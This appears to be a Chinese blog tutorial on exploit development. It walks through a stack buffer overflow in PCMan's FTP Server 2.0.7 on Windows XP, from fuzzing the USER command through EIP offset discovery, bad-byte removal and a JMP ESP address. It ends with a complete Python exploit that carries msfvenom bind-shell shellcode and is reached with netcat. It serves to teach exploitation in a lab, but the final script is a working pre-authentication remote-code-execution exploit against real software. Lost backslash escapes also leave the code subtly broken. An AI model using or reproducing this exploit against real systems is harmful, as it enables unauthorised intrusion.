c++堆栈溢出怎么解决_跟小黑学漏洞利用开发之简单的缓冲区溢出

40a2201940db45eff9447e11afcf183d.png

本文章,我们将研究如何在Win32系统上利用缓冲区漏洞,完成我们的Windows漏洞利用开发,从最基础的开发开始,特别说明本篇文章中暂时不涉及DEP和ALSR等漏洞利用让技术,相关技术以后文章在专门介绍了解此类。本篇主要是给各位跟我一样喜欢漏洞利用开发的同(样爱)好,做一个开篇引导,对于某些同好可能是ta进入这个领域的第一个Exploit Dev

准备

WindowsXP—Sp3(目标机)

kali-linux(攻击机)

PCMan’s FTP Server 2.0.7

ImmunityDebugger 1.85(调试工具)—x64、OD等动态调试器都可以

需要对了解X86汇编

对python有一定了解

缓冲区溢出基础

缓冲区定义之类理论知识不在本文套路范围,更多介绍的是漏洞利用开发实际的过程和步骤,简单来说,当开发人员未对用户数据执行适当的边界检查时,就会发现缓冲区溢出的风险。因此,如果用户在输入超过开发人员的定义的缓冲区的数据,它将覆盖诸如EIP之类的关键寄存器。EIP通常都是程序下一步执行指令的

寄存器,因此当它被用户输入的垃圾数据覆盖的时,通常数据将会崩溃,因为它会跳到某个无效位置并尝试执行无效的指令。漏洞利用开发需要定制字符串发送到程序,以使我们覆盖到我们想要覆盖的EIP,使程序跳转到我们可以控制的位置,以便执行我们自己的Shellcode。如下图所示,图例完整展示了缓冲区发送的情况。缓冲区此类漏洞的产生,仅因为完全信任用户输入(例如:名称、命令信息等),而没有去检查他们是否符合要求。

a2f0d672c0d6c43e98c46394fb69bc21.png

发现缓冲区溢出

这是一个很现实的问题-“如何找出缓冲区漏洞?”。对于这种问题肯定很多人都说模糊测试(Fuzzing),既向我们要测试的程序发送长度和内容都不同的字符串。如果程序正确处理我们发送给他的字符串,则测试另外一个命令,如果程序崩溃,我们将分析崩溃原因以确定是否可以被利用。现在我们编写我们自己的模糊测试脚本来测试目标程序输入,看看是否可以在程序找到相关漏洞并且利用。在安装程序如遇到任何防火墙拦截,请将放行,方便我们正常访问。

在连接FTP一般遇到第一个命令就是“USER”,后面再跟“PASS”,然后进行登录。那么因此我们也可以先对其进行测试,如果发现漏洞。由于他在身份验证之前,那么它应该是一个很强大的漏洞利用。因为无需凭证即可完成。

下面是一个很简单模糊测试python脚本

#!/usr/bin/python

import socket

import sys

evil = "A"*1000

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.137.128',21))

s.recv(1024)

s.send('USER ' + evil + 'rn')

s.recv(1024)

s.send('PASS anonymousrn')

s.recv(1024)

s.send('QUITrn')

s.close

当程序运行,我们就FTP服务器已经崩溃,而且Offset覆盖为‘41414141’,这是一个好兆头,说明程序可能会被我们利用。

c4ec0d8b946ab127e455a5cc982131ed.png

在目标程序打开的情况下使用ImmunityDebugger载入程序,选择File——>attach,如图所示加载PCmanFTP

bd18d3bcc9b8b76af35e4f5d76ba8974.png

熟悉逆向的朋友看到此界面肯定很熟悉,因为ImmunityDebugger基于OllyDbg基础上进行的开发。

屏幕左上—汇编窗口:显示程序目前正在执行的汇编命令

屏幕右上—寄存器窗口:用于暂时存储数据,分析程序是要经常留意数值变化,会给漏洞利用和逆向带来很大帮助

屏幕左下—内存数据窗口:用于显示当前程序内存数据

屏幕右下—堆栈窗口:用于显示当前程序堆栈情况

230505b6d2d0d23abf7083ff91a1cd02.png

我们再次运行我们的Fuzz脚本,等待程序崩溃,程序一旦崩溃。ImmunityDebugger即会截停,并且寄存器相关数据也会停止在崩溃之前,详情如图。仔细观察,如前面所示。我们寄存器EIP值已经覆盖为‘41414141’,A的16进制为‘A’。当前说明我们Fuzz脚本发送的字符串,已经覆盖到EIP。这以为着程序因为读取到0x41414141地址。因为是无效地址,所以造成崩溃。这意味我们可以控制EIP了!因为我们需要精确控制覆盖EIP里面的4个字节,所以我们需要了解到底是3000个A中那部分覆盖到此处。在Metasploit中pattern_create可以很好帮助我们解决此问题,因为他会生成一串唯一的字符串,通过该字符串匹配到地址可以使用它的姐妹工具pattern_offset来精确寻找那4个字节覆盖EIP。当然本文这里给出另外一个更加方便的方法,使用漏洞利用开发神器—mona.py插件,此插件自寻搜索安装。本文不再阐述相关安装过程,因为会占用各位大量阅读时间。

e19dabc81bda5d5aac212d2dda3a7612.png

早期pattern_create和pattern_offset工具使用需要到metasploit目录中,使用不太方便。现在新版本kali支持命令行执行。

相关命令如下:msf-pattern_create、msf-pattern_offset

使用msf-pattern_create -l 3000shen生成与POC相等数量的字符串,并且将编写运行。

26a2d7eb52f379d9f11ca872f0d5bf08.png

代码如下:

#!/usr/bin/python

import socket

import sys

#evil = "A"*3000

evil = ("Aa0Aa1Aa2Aa3.........v7Dv8Dv9")

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.137.128',21))

s.recv(1024)

s.send('USER ' + evil + 'rn')

s.recv(1024)

s.send('PASS anonymousrn')

s.recv(1024)

s.send('QUITrn')

s.close

再次运行我们的Fuzz脚本,程序再次崩溃,调试器在崩溃前暂停,并且我们查看最新的EIP值,此值变成‘0x6F43366F’。

939a7d1fea4c9c0682841606b87b88be.png

控制EIP

此时按照常规计算此地址偏移,我们将使用姐妹工具msf-pattern_offset进行计算,这里给大家提供一个更加方便的Mona。如图所示,计算出偏移1999(偏移值这个不同系统数值不同)

e51eff16229cfd27309ef4f77b5331cf.png

当然我们运行姐妹工具,msf-pattern_offset -q 6F43366F.

5f4a0532248605bb4ef83eecbd005f2e.png

这里将两种方法列出来,取决于各位自行选择。

现在我们已经知道了EIP被覆盖前会存在1999字节。为了方便后面测试,我们需要修改利用程序以确定我们精确覆盖EIP。当然我们还需要考虑shellcode 是否存的下,因此我们需要在数据末尾填充C*(3000-1999-4)

代码如下:

#!/usr/bin/python

import socket

import sys

#evil = "A"*3000

evil = "A" * 1999 + "B" * 4 + "C" * (3000-1999-4)

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.137.128',21))

s.recv(1024)

s.send('USER ' + evil + 'rn')

s.recv(1024)

s.send('PASS anonymousrn')

s.recv(1024)

s.send('QUITrn')

s.close

再次重启我们的程序,并且发送我们修改的利用程序,,如图所示EIP已经精准被‘42424242’覆盖,这是'B'的ASCII值。现在,我们可以精准控制EIP值。这里漏洞利用,我们基本成功了一半。

f874b8323dc56608d4583c3e8fabbdce.png

寻找shellcode空间

通过我们控制EIP,可以查找可能的shellcode空间。在某些漏洞利用中,这可能变的非常复杂,但这是一个很简单示例。一个很好技巧就是看EIP指向的地址,在这种情况右下窗口栈地址‘0x0012EDB8’,如下所示。具体到栈底距离+3E0转换为996字节,这个是足够放下shellcode。因为一般正常shellcode大小差不多355~550字节左右。

显然,这里它指向一堆'43',43是C的ASCII值,换句话说B覆盖到EIP之后立刻跳转C。在实际堆栈中,我们可以清楚看到4个B和我们之前填充的A值。如果我们需要用shellcode代替C,那就必须要运行起来,这里可以通过某些方式指示ESP跳转到ESP寄存器位置,那么shellcode就运行起来了。

e1ff2e87b74a289008676131b1b5680c.png

坏字节

我们最终目的想执行shellcode,那么我们如何知道我们可以使用那些命令,那么命令有效以及那些命令会使程序解释成其他内容?典型的示例就空字节0x00,这几乎是普遍坏字节。我们将漏洞利用作为字符串发送的服务器,如果类似0x00存在shellcode中,将导致shellcode运行不了,漏洞利用失败。可能还要一些其他因素以不同方式影响程序,因此我们通过发送所有有效字符串来识别他们。如果字符串中特定的字符串被阶段或者产生偏移,我们将知道此字符对我们漏洞利用受到影响。这里我们生成以下内容配合先前利用程序一起发送出去。Mona支持生成坏字节相关命令如下!mona bytearray -cpb 'x00'

513e9a57a06c7c5b711b71f1240197d2.png

这里我们生成排除0x00空字节的字符串,此字符串包含所有会用到的字符串。Mona生成坏字节在调试器根目录bytearry.TXT文件中,详情如图所示。

a01edeff7509a8af269b0e69c50f9e9e.png

合并在代码中如下:

#!/usr/bin/python

import socket

import sys

#evil = "A"*3000

badchar = ("x01x02x03x04x05x06x07x08x09x0ax0bx0cx0dx0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1fx20"

"x21x22x23x24x25x26x27x28x29x2ax2bx2cx2dx2ex2fx30x31x32x33x34x35x36x37x38x39x3ax3b x3dx3ex3fx40"

"x41x42x43x44x45x46x47x48x49x4ax4bx4cx4dx4ex4fx50x51x52x53x54x55x56x57x58x59x5ax5bx5cx5dx5ex5fx60"

"x61x62x63x64x65x66x67x68x69x6ax6bx6cx6dx6ex6fx70x71x72x73x74x75x76x77x78x79x7ax7bx7cx7dx7ex7fx80"

"x81x82x83x84x85x86x87x88x89x8ax8bx8cx8dx8ex8fx90x91x92x93x94x95x96x97x98x99x9ax9bx9cx9dx9ex9fxa0"

"xa1xa2xa3xa4xa5xa6xa7xa8xa9xaaxabxacxadxaexafxb0xb1xb2xb3xb4xb5xb6xb7xb8xb9xbaxbbxbcxbdxbexbfxc0"

"xc1xc2xc3xc4xc5xc6xc7xc8xc9xcaxcbxccxcdxcexcfxd0xd1xd2xd3xd4xd5xd6xd7xd8xd9xdaxdbxdcxddxdexdfxe0"

"xe1xe2xe3xe4xe5xe6xe7xe8xe9xeaxebxecxedxeexefxf0xf1xf2xf3xf4xf5xf6xf7xf8xf9xfaxfbxfcxfdxfexff")

evil = evil = "A" * 1999 + badchar + "C" * (3000-1999-len(badchar))

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.137.128',21))

s.recv(1024)

s.send('USER ' + evil + 'rn')

s.recv(1024)

s.send('PASS anonymousrn')

s.recv(1024)

s.send('QUITrn')

s.close

正如图所示。从01到FF所有字符都在这里,知道0A变成00乱序。显然0x0A对我们利用产生了影响。我们将其删除,并使用下面的代码重新发送利用代码

d9d0f8229bb1025aed77051a501fcda3.png

更新代码发现新的坏字节0x0d,修改代码重新发送利用

890b91c64032c8c510c23e99bb931cd7.png

再次更新代码,并在删除0x0d情况下发送(为了简介,这里就不贴代码了),如图所示。可以清楚看到其他字符一直没有变化,一直到0xFF。因此我们一共识别出三个坏字节0x00、0x0a、0x0d。这里我们可以很容易理解为什么对我们产生影响。

c8fc6981545a8dc34817b595f270f546.png

JMP ESP

这里我们为什么不直接告诉EIP转到我们需要的地址‘0x0012EDB8’?因为这个有几个原因,但是最大原因是,此值会因为计算机不同而异,你现在可以在自己计算机上使用该漏洞利用程序,但是我们希望它可以任何地方和位置。因此,我们需要考虑利用程序中自包含的DLL库,这些DLL与FTP程序相反,这些DLL文件在内存映射的地址始终相同。如果我们可以在具有‘JMP ESP’指令的DLL中找到对应内存地址,则可以将EIP指向此地址,从而使跳入C的缓冲区。

这里我们需要检查该程序加载的DLL文件,并且找到具备JMP ESP的DLL。这种情况,我们可以使用Mona插件!mona jmp -r esp,我们最终选择还是系统的DLL。原因是由于如下图所示,程序自带DLL包含00,同时由于我们坏字节包含00,所以这里不建议使用此地址,选择跳转地址建议确保不包含坏字节,同时对于系统DLL尽可能选择user32.Dll或shell32.dll,这样会高我们的漏洞利用成功率。

423e121cd7ac85ce10c3ee56e530c2d5.png

程序自带DLL包含坏字节

b2199525068516aff79fbe66cf4e6572.png

获取到地址0x77F8B227,通过调试器跳入地址查看地址情况,该地址非常合适,因为没有包含已知坏字节。这里我们像往常一样重启程序。重新发起利用。不过在此之前我们需要做一点点事情,跳转到我们选择的地址。按F2在该地址设置断点。让调试器暂停在此地址。然后我们发起漏洞利用程序,此时我们调试器暂定在我们选择的地址上。

331ee4584b0dbdddf4facbc3d30cb83e.png

在这种情况,我们看到调试器暂停在我们断点处。按F7通过单步进入下一条指令,现在他跳入到很长‘INC EBX’字符串。这恰好就是十六进制43的值。换句话说,我们成功进入到C缓冲区。

4c3778e3aec3bff6b7092794a745b78c.png

编写Shellcode

现在我们识别出了坏字节,这里需要说明我们绝不能让shellcode包含坏字节。为了帮助我们生成Shellcode,因此不需要自己过多进行编码,我们可以使用metasploit的msfvenom工具生成相对应的playload,这里我使用本地开启端口,直连方式,相关命令如下:

msfvenom -p windows/shell_bind_tcp EXITFUNC=thread -f python -v shellcode -b "x00x0ax0d"

a712c5433dadd360063327ad07819f09.png

最后EXP编写

我们在最后跳转地址加入若干NOP字符,NOP代表跳过,意味着什么都不需要操作,并且指示CPI跳过此指令。有时候可以通过在shellcode前填充NOP增加漏洞利用程序和shellcode可靠性。这里我添加50个NOP,以提高可靠性。最终代码如下

#!/usr/bin/python

import socket

import sys

#evil = "A"*3000

#77F8B227 jmp

shellcode = b""

shellcode += b"xbexb8xa5xbbxf7xddxc7xd9x74x24xf4"

shellcode += b"x58x33xc9xb1x53x83xc0x04x31x70x0e"

shellcode += b"x03xc8xabx59x02xd4x5cx1fxedx24x9d"

shellcode += b"x40x67xc1xacx40x13x82x9fx70x57xc6"

shellcode += b"x13xfax35xf2xa0x8ex91xf5x01x24xc4"

shellcode += b"x38x91x15x34x5bx11x64x69xbbx28xa7"

shellcode += b"x7cxbax6dxdax8dxeex26x90x20x1ex42"

shellcode += b"xecxf8x95x18xe0x78x4axe8x03xa8xdd"

shellcode += b"x62x5ax6axdcxa7xd6x23xc6xa4xd3xfa"

shellcode += b"x7dx1exafxfcx57x6ex50x52x96x5exa3"

shellcode += b"xaaxdfx59x5cxd9x29x9axe1xdaxeexe0"

shellcode += b"x3dx6exf4x43xb5xc8xd0x72x1ax8ex93"

shellcode += b"x79xd7xc4xfbx9dxe6x09x70x99x63xac"

shellcode += b"x56x2bx37x8bx72x77xe3xb2x23xddx42"

shellcode += b"xcax33xbex3bx6ex38x53x2fx03x63 "

shellcode += b"x9cx2ex9bxbcx8ax39xe8x8ex15x92x66"

shellcode += b"xa3xde x71xc4xf4xf9xedx3bxf7xf9"

shellcode += b"x24xf8xa3xa9x5ex29xccx21x9exd6x19"

shellcode += b"xdfx96x71xf2xc2x5bxc1xa2x42xf3xaa"

shellcode += b"xa8x4cx2cxcaxd2x86x45x63x2fx29x78"

shellcode += b"x28xa6xcfx10xc0xeex58x8cx22xd5x50"

shellcode += b"x2bx5cx3fxc9xdbx15x29xcexe4xa5x7f"

shellcode += b"x78x72x2ex6cxbcx63x31xb9x94xf4xa6"

shellcode += b"x37x75xb7x57x47x5cx2fxfbxdax3bxaf"

shellcode += b"x72xc7x93xf8xd3x39xeax6cxcex60x44"

shellcode += b"x92x13xf4xafx16xc8xc5x2ex97x9dx72"

shellcode += b"x15x87x5bx7ax11xf3x33x2dxcfxadxf5"

shellcode += b"x87xa1x07xacx74x68xcfx29xb7xabx89"

shellcode += b"x35x92x5dx75x87x4bx18x8ax28x1cxac"

shellcode += b"xf3x54xbcx53x2exddxdcxb1xfax28x75"

shellcode += b"x6cx6fx91x18x8fx5axd6x24x0cx6exa7"

shellcode += b"xd2x0cx1bxa2x9fx8axf0xdexb0x7exf6"

shellcode += b"x4dxb0xaa"

evil = evil = "A" * 1999 + "x27xB2xF8x77" + "x90" * 50 + shellcode + "x90" * 10

s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)

connect=s.connect(('192.168.137.128',21))

s.recv(1024)

s.send('USER ' + evil + 'rn')

s.recv(1024)

s.send('PASS anonymousrn')

s.recv(1024)

s.send('QUITrn')

s.close

现在是激动人心的时刻,运行我们的exploit,这里如果在渗透测试过程中可以考虑设置443或者其他端口,甚至反弹shell。

852eb16ac5f7b4de5dfc58c9ec1c6126.png

这里,在指点各位最后一下。这里就不在需要调试器了,开启目标程序。

准备好Net Cat连接,打完收工Over!

4b7c41eb4499493bd6d321234d4208bd.png

写到最后,原本以为1~2个小时搞定的文章,真写起来各种查漏补缺。相当于自己又重新学习一边。这里说下关于目标程序Pcman FTP还有其他很多类似缓冲区漏洞,大家有兴趣可以自己挖掘。

如果大家对此有兴趣同时我也有时间将更新其他相关漏洞利用相关教程。欢迎大家一起交流^_^!

  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值